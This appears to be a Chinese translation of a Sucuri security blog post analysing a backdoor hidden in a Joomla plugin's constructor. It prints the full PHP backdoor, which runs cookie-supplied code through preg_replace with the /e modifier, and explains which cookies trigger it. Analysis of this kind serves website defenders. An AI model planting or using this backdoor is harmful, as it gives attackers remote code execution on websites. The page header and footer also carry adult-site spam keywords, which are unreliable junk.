成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Joomla插件構造函數后門分析

安全 黑客攻防
本文介紹我們在Joomla插件中發現的一個有趣的后門。

本文介紹我們在Joomla插件中發現的一個有趣的后門。

Joomla插件構造函數后門分析

盡管感覺有點不太對勁,不過由于代碼組織良好,最開始我們沒有意識到里面包含后門。插件的代碼如下所示:

Joomla插件構造函數后門分析

乍一看沒什么特別的,沒有代碼加密,沒有代碼混淆,也沒什么注釋,就是正常的Joomla插件代碼。

但是如果仔細研究就會發現,類的構造函數不太正常:

public function __construct() {

$filter = JRequest::getString('p3', Null, 'cookie');

if ($filter) {

$option = $filter(JRequest::getString('p2', Null, 'cookie'));

$auth = $filter(JRequest::getString('p1', Null, 'cookie'));

$option("/123/e",$auth,123);

die();

}

}

第一個真正可疑的是代碼結尾處的die();,該函數會終止腳本的執行,放在Joomla插件中,表示該函數會終止Joomla的執行。插件不應該這么做,特別是在初始化階段。

另外,讀者可能已經注意到了字符串“/123/e”,類似于許多基于preg_replace的后門中“eval”標記的正則表達式匹配模式。這么一看就會發現,如果用preg_replace替換掉$option,恰好得到一句經典的gre_replace后門代碼:

preg_replace("/123/e", $auth, 123);

123總是與123匹配,所以這段代碼總是會取得$auth變量的值,不管這個值是什么。

為了使該假設變成真,$option應該等價于“preg_replace”,$auth應該包含PHP功能代碼。那么這種想法是否可行呢?我們可以看到這兩個變量都是用cookie值填充的,所以,是的,這種想法是可行的。

通過分析代碼可以看到該后門以如下方式運行:

1,Joomla中啟用該插件后,會在每個頁面加載,因此插件的類的構造函數總能得到執行。

2,攻擊者可以通過設置以下cookie請求網站的任意頁面:

p3 - 該變量觸發后門執行,如果沒有該變量,Joomla會正常執行。

p2 - 該變量的值應該設置為“preg_replace”、

p1 - 任意PHP功能代碼

整個插件都是惡意代碼嗎

我之前的文章中提到,惡意代碼被植入到Wordpress插件后被重新打包成盜版商業插件,但與此不同的是,本文提到的Joomla插件看起來不像是站長從某個小網站弄來的,該插件名為InstantSuggest,是一款免費插件,并不怎么流行(下載量小于400)。其官方代碼中不包含__construct()函數。

可以看到源碼中的漏洞已經補上了,因此最有可能的情況是黑客黑進該站點后添加了這個后門。事實上我們也是在一個被黑網站上發現這個后門的(這個沒什么可驚喜的,我們的大部分工作都是與被黑站點打交道)。

另外,黑客不是僅僅將后門注入到某個插件中,而是安裝到某個已經打過補丁的插件里,這樣看起不可疑,也不會破壞任何東西。這比修改網站中現有的文件要容易一些,因為修改網站現有文件時有時候可能會會破壞網站,因此需要更復雜的injector。

為證明這一假設,我們搜索了網絡中包含該后門代碼的網站,發現幾乎全都包含在instantsuggest代碼中——我不相信所有這些網站都是主動安裝了這個不知名的插件。另外,這段惡意代碼也被用在了Joomla上下文之外,將Joomla API請求替換為簡單的@$_COOKIE調用(可參考cPanel論壇)。即使在這些案例中,其仍然被包含在instantsuggest代碼中——這么做只是為了使后門看起來不那么可疑。

To 站長:

如讀者所見,黑客可以可很容易將后門隱藏在我們的眼皮底下,當人工審查代碼時很難將其辨識出來,特別是像Joomla這種包含上千個文件的系統,安全掃描器也可能無法識別這種不常見的后門。檢測這種后門唯一可靠的方法就是完整性控制,當檢測到文件被修改時提供向站長提供警報,使站長可以立即解決可能產生的問題。許多版本控制系統可以完成這種工作 ,如果讀者啟用我們的Sucuri監控服務中的服務端掃描,也可以發現服務中的完整性控制功能。

還需要說明的是,通過cookie向后門中傳遞惡意代碼已經成為趨勢,利用這種方式,黑客可以使用常規GET請求,這樣就不會在web服務日志分析系統中產生任何可疑操作。要檢測并阻止這種請求,站長需要一款更高級的website防火墻解決方案。

原文地址:http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2013-08-09 09:50:34

2011-03-30 10:53:45

2015-03-02 11:08:02

2025-02-06 13:23:09

C++函數參數

2012-02-01 17:38:09

2016-02-25 11:02:11

2013-06-19 10:03:42

2013-10-21 11:37:03

騰達Tenda路由器

2021-12-09 10:56:50

函數C++原型

2013-10-24 09:52:06

2023-03-09 08:30:34

2013-08-26 11:09:27

2010-09-13 14:47:58

2010-09-13 15:06:36

2009-09-17 18:56:22

CLR Via C#

2010-09-13 14:57:29

2021-12-10 10:45:36

C++函數Stock

2009-07-31 14:15:38

C# 構造函數

2009-08-24 18:09:13

C#構造函數

2010-07-16 16:56:01

Perl構造函數
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: av黄色在线| 亚洲综合中文字幕在线观看 | 亚洲国产精品激情在线观看 | 日韩欧美视频网站 | 久久免费精彩视频 | 精品国产一区二区三区av片 | 日本一区二区三区四区 | 日本不卡一区 | 少妇一级淫片aaaaaaaaa | 久久小视频 | 久久久久国产成人精品亚洲午夜 | 91一区二区 | 国产91亚洲精品 | 日韩一区二区免费视频 | 羞羞免费网站 | 欧美不卡一区二区 | 欧美二区乱c黑人 | 999国产精品视频 | 99国产在线| 91传媒在线播放 | 中文字幕一区二区三区四区五区 | 免费久久视频 | 色婷婷av777 av免费网站在线 | 国内精品久久久久久 | 日日草天天干 | 日本亚洲欧美 | 亚洲高清在线 | 密室大逃脱第六季大神版在线观看 | 国产精品免费高清 | 日日艹夜夜艹 | 91视频在线| 全免费a级毛片免费看视频免 | 国精产品一区二区三区 | 国产成人精品网站 | 一区视频在线 | 国产成人在线免费 | 欧美久久视频 | 五月婷婷丁香婷婷 | 成人免费精品视频 | 久热国产在线 | 亚洲情综合五月天 |